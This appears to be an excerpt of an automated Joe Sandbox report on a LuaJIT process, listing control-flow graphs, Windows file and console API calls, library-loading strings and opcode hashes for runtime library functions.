                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cf58da845510f8d2f0a24c94611b49bfb822de0e522ae078ac23593eeee7cf45
                                                                                                                                                                        • Instruction ID: 35a48df5a61f378ac0129de7055b813d8e1906d98d137aac32edc2e28bab66c6
                                                                                                                                                                        • Opcode Fuzzy Hash: cf58da845510f8d2f0a24c94611b49bfb822de0e522ae078ac23593eeee7cf45
                                                                                                                                                                        • Instruction Fuzzy Hash: 29D12830C18B0E9AD75AAF3584C49B5B3A1FF19305F859379EC8EA6086DF3474C68297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B11E0C Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 7ff738b11e0c-7ff738b11e7f call 7ff738b119f0 3 7ff738b11e99-7ff738b11ea3 call 7ff738b179a0 0->3 4 7ff738b11e81-7ff738b11e8a call 7ff738afaed8 0->4 9 7ff738b11ebe-7ff738b11f27 CreateFileW 3->9 10 7ff738b11ea5-7ff738b11ebc call 7ff738afaed8 call 7ff738afaef8 3->10 11 7ff738b11e8d-7ff738b11e94 call 7ff738afaef8 4->11 14 7ff738b11f29-7ff738b11f2f 9->14 15 7ff738b11fa4-7ff738b11faf GetFileType 9->15 10->11 22 7ff738b121d2-7ff738b121f2 11->22 20 7ff738b11f71-7ff738b11f9f GetLastError call 7ff738afae88 14->20 21 7ff738b11f31-7ff738b11f35 14->21 17 7ff738b11fb1-7ff738b11fec GetLastError call 7ff738afae88 CloseHandle 15->17 18 7ff738b12002-7ff738b12009 15->18 17->11 34 7ff738b11ff2-7ff738b11ffd call 7ff738afaef8 17->34 25 7ff738b1200b-7ff738b1200f 18->25 26 7ff738b12011-7ff738b12014 18->26 20->11 21->20 27 7ff738b11f37-7ff738b11f6f CreateFileW 21->27 32 7ff738b1201a-7ff738b1206b call 7ff738b178b8 25->32 26->32 33 7ff738b12016 26->33 27->15 27->20 39 7ff738b1208a-7ff738b120ba call 7ff738b1175c 32->39 40 7ff738b1206d-7ff738b12079 call 7ff738b11bfc 32->40 33->32 34->11 46 7ff738b120bc-7ff738b120ff 39->46 47 7ff738b1207d-7ff738b12085 call 7ff738b0d5d8 39->47 40->39 45 7ff738b1207b 40->45 45->47 49 7ff738b12121-7ff738b1212c 46->49 50 7ff738b12101-7ff738b12105 46->50 47->22 53 7ff738b121d0 49->53 54 7ff738b12132-7ff738b12136 49->54 50->49 52 7ff738b12107-7ff738b1211c 50->52 52->49 53->22 54->53 55 7ff738b1213c-7ff738b12181 CloseHandle CreateFileW 54->55 56 7ff738b12183-7ff738b121b1 GetLastError call 7ff738afae88 call 7ff738b17ae0 55->56 57 7ff738b121b6-7ff738b121cb 55->57 56->57 57->53
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1330151763-0
                                                                                                                                                                        • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction ID: fae657366cf6ce9a0ffc4c86a90764217059809a0d650056a525940c66e7f05f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction Fuzzy Hash: 62C10437B24A4695EB10DF68C4805ADB771FB48B98B901325DE2E8B7D4CF3AE051D315
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0E1DC Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 62 7ff738b0e1dc-7ff738b0e202 63 7ff738b0e21d-7ff738b0e221 62->63 64 7ff738b0e204-7ff738b0e218 call 7ff738afaed8 call 7ff738afaef8 62->64 65 7ff738b0e227-7ff738b0e22e 63->65 66 7ff738b0e600-7ff738b0e60c call 7ff738afaed8 call 7ff738afaef8 63->66 78 7ff738b0e617 64->78 65->66 69 7ff738b0e234-7ff738b0e266 65->69 85 7ff738b0e612 call 7ff738b08b14 66->85 69->66 72 7ff738b0e26c-7ff738b0e273 69->72 75 7ff738b0e28c-7ff738b0e28f 72->75 76 7ff738b0e275-7ff738b0e287 call 7ff738afaed8 call 7ff738afaef8 72->76 81 7ff738b0e5fc-7ff738b0e5fe 75->81 82 7ff738b0e295-7ff738b0e297 75->82 76->85 83 7ff738b0e61a-7ff738b0e631 78->83 81->83 82->81 86 7ff738b0e29d-7ff738b0e2a0 82->86 85->78 86->76 89 7ff738b0e2a2-7ff738b0e2c8 86->89 90 7ff738b0e307-7ff738b0e30f 89->90 91 7ff738b0e2ca-7ff738b0e2cd 89->91 95 7ff738b0e2d9-7ff738b0e2f0 call 7ff738afaed8 call 7ff738afaef8 call 7ff738b08b14 90->95 96 7ff738b0e311-7ff738b0e339 call 7ff738b0a290 call 7ff738b09294 * 2 90->96 93 7ff738b0e2cf-7ff738b0e2d7 91->93 94 7ff738b0e2f5-7ff738b0e302 91->94 93->94 93->95 98 7ff738b0e38b-7ff738b0e39e 94->98 127 7ff738b0e490 95->127 123 7ff738b0e33b-7ff738b0e351 call 7ff738afaef8 call 7ff738afaed8 96->123 124 7ff738b0e356-7ff738b0e387 call 7ff738b10728 96->124 101 7ff738b0e41a-7ff738b0e424 call 7ff738afa548 98->101 102 7ff738b0e3a0-7ff738b0e3a8 98->102 114 7ff738b0e42a-7ff738b0e43f 101->114 115 7ff738b0e4ae 101->115 102->101 106 7ff738b0e3aa-7ff738b0e3ac 102->106 106->101 110 7ff738b0e3ae-7ff738b0e3c5 106->110 110->101 116 7ff738b0e3c7-7ff738b0e3d3 110->116 114->115 120 7ff738b0e441-7ff738b0e453 GetConsoleMode 114->120 118 7ff738b0e4b3-7ff738b0e4d3 ReadFile 115->118 116->101 121 7ff738b0e3d5-7ff738b0e3d7 116->121 125 7ff738b0e4d9-7ff738b0e4e1 118->125 126 7ff738b0e5c6-7ff738b0e5cf GetLastError 118->126 120->115 128 7ff738b0e455-7ff738b0e45d 120->128 121->101 122 7ff738b0e3d9-7ff738b0e3f1 121->122 122->101 129 7ff738b0e3f3-7ff738b0e3ff 122->129 123->127 124->98 125->126 131 7ff738b0e4e7 125->131 134 7ff738b0e5ec-7ff738b0e5ef 126->134 135 7ff738b0e5d1-7ff738b0e5e7 call 7ff738afaef8 call 7ff738afaed8 126->135 136 7ff738b0e493-7ff738b0e49d call 7ff738b09294 127->136 128->118 133 7ff738b0e45f-7ff738b0e481 ReadConsoleW 128->133 129->101 138 7ff738b0e401-7ff738b0e403 129->138 142 7ff738b0e4ee-7ff738b0e503 131->142 144 7ff738b0e4a2-7ff738b0e4ac 133->144 145 7ff738b0e483 GetLastError 133->145 139 7ff738b0e489-7ff738b0e48b call 7ff738afae88 134->139 140 7ff738b0e5f5-7ff738b0e5f7 134->140 135->127 136->83 138->101 148 7ff738b0e405-7ff738b0e415 138->148 139->127 140->136 142->136 150 7ff738b0e505-7ff738b0e510 142->150 144->142 145->139 148->101 155 7ff738b0e537-7ff738b0e53f 150->155 156 7ff738b0e512-7ff738b0e52b call 7ff738b0dda0 150->156 159 7ff738b0e541-7ff738b0e553 155->159 160 7ff738b0e5b4-7ff738b0e5c1 call 7ff738b0db58 155->160 162 7ff738b0e530-7ff738b0e532 156->162 163 7ff738b0e5a7-7ff738b0e5af 159->163 164 7ff738b0e555 159->164 160->162 162->136 163->136 166 7ff738b0e55a-7ff738b0e561 164->166 167 7ff738b0e59d-7ff738b0e5a1 166->167 168 7ff738b0e563-7ff738b0e567 166->168 167->163 169 7ff738b0e569-7ff738b0e570 168->169 170 7ff738b0e583 168->170 169->170 171 7ff738b0e572-7ff738b0e576 169->171 172 7ff738b0e589-7ff738b0e599 170->172 171->170 173 7ff738b0e578-7ff738b0e581 171->173 172->166 174 7ff738b0e59b 172->174 173->172 174->163
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: cba73ceef4245a3387785af76a2bd29b1685e99a0e17626f03ba81314b1aa7ff
                                                                                                                                                                        • Instruction ID: 0af694e1b1bde08217c4d5e033311ae7c132f76671a366e67c6597a9509e11d9
                                                                                                                                                                        • Opcode Fuzzy Hash: cba73ceef4245a3387785af76a2bd29b1685e99a0e17626f03ba81314b1aa7ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 34C102A3A0C687A1EA606B159400ABDEB50FB81B80FC40131EA6D07791DF7EF445E72B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0CDE4 Relevance: 7.7, APIs: 5, Instructions: 202COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 175 7ff738b0cde4-7ff738b0ce09 176 7ff738b0d0ad 175->176 177 7ff738b0ce0f-7ff738b0ce12 175->177 178 7ff738b0d0af-7ff738b0d0c6 176->178 179 7ff738b0ce33-7ff738b0ce5a 177->179 180 7ff738b0ce14-7ff738b0ce2e call 7ff738afaed8 call 7ff738afaef8 call 7ff738b08b14 177->180 181 7ff738b0ce5c-7ff738b0ce63 179->181 182 7ff738b0ce65-7ff738b0ce6b 179->182 180->178 181->180 181->182 184 7ff738b0ce7b-7ff738b0ce89 call 7ff738afa548 182->184 185 7ff738b0ce6d-7ff738b0ce76 call 7ff738b10728 182->185 192 7ff738b0cf9a-7ff738b0cfaa 184->192 193 7ff738b0ce8f-7ff738b0ce9f 184->193 185->184 195 7ff738b0cff9-7ff738b0d01e WriteFile 192->195 196 7ff738b0cfac-7ff738b0cfb1 192->196 193->192 197 7ff738b0cea5-7ff738b0ceb8 call 7ff738b0a9a0 193->197 202 7ff738b0d029 195->202 203 7ff738b0d020-7ff738b0d026 GetLastError 195->203 199 7ff738b0cfb3-7ff738b0cfb6 196->199 200 7ff738b0cfe5-7ff738b0cff7 call 7ff738b0c968 196->200 214 7ff738b0ceba-7ff738b0ceca 197->214 215 7ff738b0ced0-7ff738b0ceec GetConsoleMode 197->215 205 7ff738b0cfb8-7ff738b0cfbb 199->205 206 7ff738b0cfd1-7ff738b0cfe3 call 7ff738b0cb88 199->206 220 7ff738b0cf8e-7ff738b0cf95 200->220 204 7ff738b0d02c 202->204 203->202 209 7ff738b0d031 204->209 210 7ff738b0cfbd-7ff738b0cfcf call 7ff738b0ca6c 205->210 211 7ff738b0d036-7ff738b0d040 205->211 206->220 209->211 210->220 216 7ff738b0d042-7ff738b0d047 211->216 217 7ff738b0d0a6-7ff738b0d0ab 211->217 214->192 214->215 215->192 221 7ff738b0cef2-7ff738b0cef5 215->221 222 7ff738b0d049-7ff738b0d04c 216->222 223 7ff738b0d076-7ff738b0d087 216->223 217->178 220->209 225 7ff738b0cefb-7ff738b0cf02 221->225 226 7ff738b0cf7c-7ff738b0cf89 call 7ff738b0c47c 221->226 230 7ff738b0d069-7ff738b0d071 call 7ff738afae88 222->230 231 7ff738b0d04e-7ff738b0d05e call 7ff738afaef8 call 7ff738afaed8 222->231 227 7ff738b0d089-7ff738b0d08c 223->227 228 7ff738b0d08e-7ff738b0d09e call 7ff738afaef8 call 7ff738afaed8 223->228 225->211 229 7ff738b0cf08-7ff738b0cf16 225->229 226->220 227->176 227->228 228->217 229->204 233 7ff738b0cf1c 229->233 230->223 231->230 237 7ff738b0cf1f-7ff738b0cf36 call 7ff738b1d144 233->237 247 7ff738b0cf38-7ff738b0cf42 237->247 248 7ff738b0cf6e-7ff738b0cf77 GetLastError 237->248 249 7ff738b0cf5f-7ff738b0cf66 247->249 250 7ff738b0cf44-7ff738b0cf56 call 7ff738b1d144 247->250 248->204 249->204 252 7ff738b0cf6c 249->252 250->248 254 7ff738b0cf58-7ff738b0cf5d 250->254 252->237 254->249
                                                                                                                                                                        APIs
                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B0CE26
                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3,?,?,FFFFFFFE,00007FF738B0D196), ref: 00007FF738B0CEE4
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3,?,?,FFFFFFFE,00007FF738B0D196), ref: 00007FF738B0CF6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2210144848-0
                                                                                                                                                                        • Opcode ID: 40fda585d9d5e5497b1d355301c849312dfd192a2488e1c330e367bd86c0f89a
                                                                                                                                                                        • Instruction ID: 3b2a4c53e52454f98a0ab614d7c0a6b13e13b102f01b5a0dae5c1e841268646f
                                                                                                                                                                        • Opcode Fuzzy Hash: 40fda585d9d5e5497b1d355301c849312dfd192a2488e1c330e367bd86c0f89a
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F81B563E19613A9F710BB648850ABCE761BB44B84FD40131DE2E53791DF3AA445E33B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A4F8B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 255 7ff738a4f8b0-7ff738a4f8dc 257 7ff738a4fbd0-7ff738a4fbe2 call 7ff738a40950 255->257 258 7ff738a4f8e2-7ff738a4f8f4 255->258 266 7ff738a4fbe4-7ff738a4fbe8 257->266 259 7ff738a4fb0b-7ff738a4fb34 call 7ff738a4f4a0 258->259 260 7ff738a4f8fa-7ff738a4f93f call 7ff738a4d090 258->260 270 7ff738a4fb58-7ff738a4fb67 259->270 271 7ff738a4fb36-7ff738a4fb53 call 7ff738a40a70 259->271 268 7ff738a4f97f-7ff738a4f989 260->268 269 7ff738a4f941-7ff738a4f958 260->269 275 7ff738a4f98b-7ff738a4f994 268->275 276 7ff738a4f996-7ff738a4f9a8 268->276 272 7ff738a4f95a-7ff738a4f96b call 7ff738a4f1d0 269->272 273 7ff738a4f970-7ff738a4f975 269->273 277 7ff738a4fba7-7ff738a4fbc3 call 7ff738a4f180 270->277 278 7ff738a4fb69-7ff738a4fba5 call 7ff738a51360 270->278 271->266 271->270 272->273 273->266 283 7ff738a4f9f7-7ff738a4fa07 275->283 284 7ff738a4f9aa-7ff738a4f9b3 276->284 285 7ff738a4f9b5-7ff738a4f9e8 call 7ff738a4f420 276->285 277->257 278->266 288 7ff738a4fa0d-7ff738a4fa24 283->288 289 7ff738a4fb09 283->289 290 7ff738a4f9ed-7ff738a4f9f2 284->290 285->290 292 7ff738a4fa3c-7ff738a4fa53 288->292 293 7ff738a4fa26-7ff738a4fa37 call 7ff738a4f1d0 288->293 289->270 290->283 296 7ff738a4fa55-7ff738a4fa5a 292->296 297 7ff738a4fa5f-7ff738a4fa6b 292->297 293->292 296->266 298 7ff738a4fa6d-7ff738a4fa7f call 7ff738a40950 297->298 299 7ff738a4fa81-7ff738a4fa85 297->299 304 7ff738a4faea-7ff738a4faff call 7ff738a4d290 298->304 301 7ff738a4fa87-7ff738a4faa6 299->301 302 7ff738a4faa8-7ff738a4faba 299->302 301->304 302->304 305 7ff738a4fabc-7ff738a4fad4 302->305 310 7ff738a4fb04 304->310 307 7ff738a4fad8-7ff738a4fae5 call 7ff738a40950 305->307 308 7ff738a4fad6 305->308 307->304 308->304 308->307 310->266 310->289
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID: d
                                                                                                                                                                        • API String ID: 3418686817-2564639436
                                                                                                                                                                        • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                        • Instruction ID: 05a8b3556f82e96ddd9d2c6fdcd697d111f98cc9be8649de6cea20a8d5707063
                                                                                                                                                                        • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                        • Instruction Fuzzy Hash: A191AC2360DB8592DA609B15E04036AF760F7C4BA0F549232EAEE83BE9CF3DD044DB10
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B09BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$try_get_function
                                                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                                                        • API String ID: 1203122356-3893581201
                                                                                                                                                                        • Opcode ID: a49e8d677765019be073db7e119ac0e4e27bb882df4160a7a626eb2ebf4a7855
                                                                                                                                                                        • Instruction ID: 5655e7fa6bb0c16f8d2fea9ffa2affb68e506bdc57f98d340e4f7ae1483bcad1
                                                                                                                                                                        • Opcode Fuzzy Hash: a49e8d677765019be073db7e119ac0e4e27bb882df4160a7a626eb2ebf4a7855
                                                                                                                                                                        • Instruction Fuzzy Hash: 96116D32A08BC296D760DB56F4802AAF7A0FBC9B80F544136EE8D83B59CF3DD4448B45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A56950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCallerLibraryLoadProc
                                                                                                                                                                        • String ID: SystemFunction036$advapi32.dll
                                                                                                                                                                        • API String ID: 4215043672-1354007664
                                                                                                                                                                        • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction ID: 72ce38fcd703cd5e9167286ecb13e70cb6d3026a7a3cfbb50d33353b4d2950ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction Fuzzy Hash: 93113363D1EA97E1E790BB10E445736E3A0FBC4350FD40231D98E422A5DF3EE495A639
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ABF000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF738ABEDD3), ref: 00007FF738ABF013
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,?,?,?,?,?,00007FF738ABEDD3), ref: 00007FF738ABF034
                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A817E7), ref: 00007FF738ABF061
                                                                                                                                                                          • Part of subcall function 00007FF738ABEE80: GetLastError.KERNEL32 ref: 00007FF738ABEE96
                                                                                                                                                                          • Part of subcall function 00007FF738ABEE80: FormatMessageA.KERNEL32 ref: 00007FF738ABEECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FormatLibraryLoadMessage
                                                                                                                                                                        • String ID: cannot load module '%s': %s
                                                                                                                                                                        • API String ID: 3853237079-2554058836
                                                                                                                                                                        • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction ID: c306ac26bbca1ebbba1d950a35751129f617227fd3ff35e2c70e2482e64d24cb
                                                                                                                                                                        • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction Fuzzy Hash: 99F01932919A8692DB10EB15F44161AF770FBC97D4F900135EA8D03B38DF3ED1549B19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ADD4E4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
